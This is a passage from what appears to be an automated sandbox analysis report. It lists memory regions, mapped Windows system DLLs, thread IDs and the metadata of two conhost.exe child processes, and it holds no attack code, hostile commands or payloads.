"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2949 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2950 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2951 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4527 start_va = 0x6990c00000 end_va = 0x6990c3ffff entry_point = 0x0 region_type = private name = "private_0x0000006990c00000" filename = "" Region: id = 4528 start_va = 0x6992490000 end_va = 0x699249ffff entry_point = 0x0 region_type = private name = "private_0x0000006992490000" filename = "" Region: id = 4529 start_va = 0x6992580000 end_va = 0x699258ffff entry_point = 0x0 region_type = private name = "private_0x0000006992580000" filename = "" Region: id = 4530 start_va = 0x6992590000 end_va = 0x69928c6fff entry_point = 0x6992590000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4531 start_va = 0x69928d0000 end_va = 0x6992aeafff entry_point = 0x0 region_type = private name = "private_0x00000069928d0000" filename = "" Region: id = 4532 start_va = 0x6992af0000 end_va = 0x6992d08fff entry_point = 0x0 region_type = private name = "private_0x0000006992af0000" filename = "" Region: id = 4533 start_va = 0x6992d10000 end_va = 0x6992e1cfff entry_point = 0x0 region_type = private name = "private_0x0000006992d10000" filename = "" Region: id = 4534 start_va = 0x6992e20000 end_va = 0x6993038fff entry_point = 0x0 region_type = private name = "private_0x0000006992e20000" filename = "" Region: id = 4535 start_va = 0x6993040000 end_va = 0x6993151fff entry_point = 0x0 region_type = private name = "private_0x0000006993040000" filename = "" Region: id = 4536 start_va = 0x7ff6c4269000 end_va = 0x7ff6c426afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4269000" filename = "" Region: id = 4537 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4538 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4539 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4540 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4541 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4542 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4543 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4544 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4545 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 131 os_tid = 0xf04 Thread: id = 176 os_tid = 0x450 Thread: id = 222 os_tid = 0x107c Thread: id = 300 os_tid = 0x11e0 Process: id = "101" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x789dd000" os_pid = "0xf08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "58" os_parent_pid = "0xda4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2101 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2102 start_va = 0x3cc4200000 end_va = 0x3cc421ffff entry_point = 0x0 region_type = private name = "private_0x0000003cc4200000" filename = "" Region: id = 2103 start_va = 0x3cc4220000 end_va = 0x3cc4233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003cc4220000" filename = "" Region: id = 2104 start_va = 0x3cc4240000 end_va = 0x3cc427ffff entry_point = 0x0 region_type = private name = "private_0x0000003cc4240000" filename = "" Region: id = 2105 start_va = 0x7df5ff3f0000 end_va = 0x7ff5ff3effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff3f0000" filename = "" Region: id = 2106 start_va = 0x7ff6c3d60000 end_va = 0x7ff6c3d82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d60000" filename = "" Region: id = 2107 start_va = 0x7ff6c3d83000 end_va = 0x7ff6c3d83fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d83000" filename = "" Region: id = 2108 start_va = 0x7ff6c3d8e000 end_va = 0x7ff6c3d8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d8e000" filename = "" Region: id = 2109 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2110 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2111 start_va = 0x3cc42b0000 end_va = 0x3cc43affff entry_point = 0x0 region_type = private name = "private_0x0000003cc42b0000" filename = "" Region: id = 2112 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2113 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2952 start_va = 0x3cc4200000 end_va = 0x3cc420ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003cc4200000" filename = "" Region: id = 2953 start_va = 0x3cc4210000 end_va = 0x3cc4216fff entry_point = 0x0 region_type = private name = "private_0x0000003cc4210000" filename = "" Region: id = 2954 start_va = 0x3cc4280000 end_va = 0x3cc4280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003cc4280000" filename = "" Region: id = 2955 start_va = 0x3cc4290000 end_va = 0x3cc4296fff entry_point = 0x0 region_type = private name = "private_0x0000003cc4290000" filename = "" Region: id = 2956 start_va = 0x3cc42a0000 end_va = 0x3cc42a0fff entry_point = 0x0 region_type = private name = "private_0x0000003cc42a0000" filename = "" Region: id = 2957 start_va = 0x3cc43b0000 end_va = 0x3cc446dfff entry_point = 0x3cc43b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2958 start_va = 0x3cc4470000 end_va = 0x3cc44affff entry_point = 0x0 region_type = private name = "private_0x0000003cc4470000" filename = "" Region: id = 2959 start_va = 0x3cc44b0000 end_va = 0x3cc4637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003cc44b0000" filename = "" Region: id = 2960 start_va = 0x3cc4640000 end_va = 0x3cc4640fff entry_point = 0x0 region_type = private name = "private_0x0000003cc4640000" filename = "" Region: id = 2961 start_va = 0x3cc4690000 end_va = 0x3cc469ffff entry_point = 0x0 region_type = private name = "private_0x0000003cc4690000" filename = "" Region: id = 2962 start_va = 0x3cc46a0000 end_va = 0x3cc4820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003cc46a0000" filename = "" Region: id = 2963 start_va = 0x3cc4830000 end_va = 0x3cc5c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003cc4830000" filename = "" Region: id = 2964 start_va = 0x7ff6c3c60000 end_va = 0x7ff6c3d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c60000" filename = "" Region: id = 2965 start_va = 0x7ff6c3d8c000 end_va = 0x7ff6c3d8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d8c000" filename = "" Region: id = 2966 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2967 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2968 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2969 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2970 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2971 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2972 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2973 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2974 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2975 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2976 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2977 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4841 start_va = 0x3cc4650000 end_va = 0x3cc468ffff entry_point = 0x0 region_type = private name = "private_0x0000003cc4650000" filename = "" Region: id = 4842 start_va = 0x3cc5ca0000 end_va = 0x3cc5caffff entry_point = 0x0 region_type = private name = "private_0x0000003cc5ca0000" filename = "" Region: id = 4843 start_va = 0x3cc5db0000 end_va = 0x3cc5dbffff entry_point = 0x0 region_type = private name = "private_0x0000003cc5db0000" filename = "" Region: id = 4844 start_va = 0x3cc5dc0000 end_va = 0x3cc60f6fff entry_point = 0x3cc5dc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4845 start_va = 0x3cc6100000 end_va = 0x3cc631ffff entry_point = 0x0 region_type = private name = "private_0x0000003cc6100000" filename = "" Region: id = 4846 start_va = 0x3cc6320000 end_va = 0x3cc6536fff entry_point = 0x0 region_type = private name = "private_0x0000003cc6320000" filename = "" Region: id = 4847 start_va = 0x3cc6540000 end_va = 0x3cc6652fff entry_point = 0x0 region_type = private name = "private_0x0000003cc6540000" filename = "" Region: id = 4848 start_va = 0x3cc6660000 end_va = 0x3cc6873fff entry_point = 0x0 region_type = private name = "private_0x0000003cc6660000" filename = "" Region: id = 4849 start_va = 0x3cc6880000 end_va = 0x3cc6988fff entry_point = 0x0 region_type = private name = "private_0x0000003cc6880000" filename = "" Region: id = 4850 start_va = 0x7ff6c3d8a000 end_va = 0x7ff6c3d8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d8a000" filename = "" Region: id = 4851 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4852 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4853 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4854 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4855 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4856 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4857 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4858 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4859 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 132 os_tid = 0xf0c Thread: id = 177 os_tid = 0xc08 Thread: id = 243 os_tid = 0x10d0 Thread: id = 315 os_tid = 0x121c Process: id = "102" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x793cb000" os_pid = "0xf10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xdac" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2114 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2115 start_va = 0xb18bf90000 end_va = 0xb18bfaffff entry_point = 0x0 region_type = private name = "private_0x000000b18bf90000" filename = "" Region: id = 2116 start_va = 0xb18bfb0000 end_va = 0xb18bfc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b18bfb0000" filename = "" Region: id = 2117 start_va = 0xb18bfd0000 end_va = 0xb18c00ffff entry_point = 0x0 region_type = private name = "private_0x000000b18bfd0000" filename = "" Region: id = 2118 start_va = 0x7df5ffdc0000 end_va = 0x7ff5ffdbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdc0000" filename = "" Region: id = 2119 start_va = 0x7ff6c47d0000 end_va = 0x7ff6c47f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47d0000" filename = "" Region: id = 2120 start_va = 0x7ff6c47f5000 end_va = 0x7ff6c47f5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47f5000" filename = "" Region: id = 2121 start_va = 0x7ff6c47fe000 end_va = 0x7ff6c47fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47fe000" filename = "" Region: id = 2122 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2123 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2124 start_va = 0xb18c0b0000 end_va = 0xb18c1affff entry_point = 0x0 region_type = private name = "private_0x000000b18c0b0000" filename = "" Region: id = 2125 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2126 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2692 start_va = 0xb18bf90000 end_va = 0xb18bf9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b18bf90000" filename = "" Region: id = 2693 start_va = 0xb18bfa0000 end_va = 0xb18bfa6fff entry_point = 0x0 region_type = private name = "private_0x000000b18bfa0000" filename = "" Region: id = 2694 start_va = 0xb18c010000 end_va = 0xb18c04ffff entry_point = 0x0 region_type = private name = "private_0x000000b18c010000" filename = "" Region: id = 2695 start_va = 0xb18c050000 end_va = 0xb18c050fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b18c050000" filename = "" Region: id = 2696 start_va = 0xb18c060000 end_va = 0xb18c066fff entry_point = 0x0 region_type = private name = "private_0x000000b18c060000" filename = "" Region: id = 2697 start_va = 0xb18c070000 end_va = 0xb18c070fff entry_point = 0x0 region_type = private name = "private_0x000000b18c070000" filename = "" Region: id = 2698 start_va = 0xb18c080000 end_va = 0xb18c080fff entry_point = 0x0 region_type = private name = "private_0x000000b18c080000" filename = "" Region: id = 2699 start_va = 0xb18c1b0000 end_va = 0xb18c26dfff entry_point = 0xb18c1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2700 start_va = 0xb18c3a0000 end_va = 0xb18c3affff entry_point = 0x0 region_type = private name = "private_0x000000b18c3a0000" filename = "" Region: id = 2701 start_va = 0xb18c3b0000 end_va = 0xb18c537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b18c3b0000" filename = "" Region: id = 2702 start_va = 0xb18c540000 end_va = 0xb18c6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b18c540000" filename = "" Region: id = 2703 start_va = 0xb18c6d0000 end_va = 0xb18dacffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b18c6d0000" filename = "" Region: id = 2704 start_va = 0x7ff6c46d0000 end_va = 0x7ff6c47cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c46d0000" filename = "" Region: id = 2705 start_va = 0x7ff6c47fc000 end_va = 0x7ff6c47fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47fc000" filename = "" Region: id = 2706 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2707 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2708 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2709 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2710 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2711 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2712 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2713 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2714 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2715 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2716 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2717 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4730 start_va = 0xb18c270000 end_va = 0xb18c2affff entry_point = 0x0 region_type = private name = "private_0x000000b18c270000" filename = "" Region: id = 4731 start_va = 0xb18dad0000 end_va = 0xb18dbdffff entry_point = 0x0 region_type = private name = "private_0x000000b18dad0000" filename = "" Region: id = 4732 start_va = 0xb18dc20000 end_va = 0xb18dc2ffff entry_point = 0x0 region_type = private name = "private_0x000000b18dc20000" filename = "" Region: id = 4733 start_va = 0xb18dc30000 end_va = 0xb18dd44fff entry_point = 0x0 region_type = private name = "private_0x000000b18dc30000" filename = "" Region: id = 4734 start_va = 0xb18dde0000 end_va = 0xb18ddeffff entry_point = 0x0 region_type = private name = "private_0x000000b18dde0000" filename = "" Region: id = 4735 start_va = 0xb18ddf0000 end_va = 0xb18e126fff entry_point = 0xb18ddf0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4736 start_va = 0xb18e130000 end_va = 0xb18e347fff entry_point = 0x0 region_type = private name = "private_0x000000b18e130000" filename = "" Region: id = 4737 start_va = 0xb18e350000 end_va = 0xb18e56efff entry_point = 0x0 region_type = private name = "private_0x000000b18e350000" filename = "" Region: id = 4738 start_va = 0xb18e570000 end_va = 0xb18e787fff entry_point = 0x0 region_type = private name = "private_0x000000b18e570000" filename = "" Region: id = 4739 start_va = 0x7ff6c47fa000 end_va = 0x7ff6c47fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47fa000" filename = "" Region: id = 4740 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4741 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4742 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4743 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4744 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4745 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4746 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4747 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = 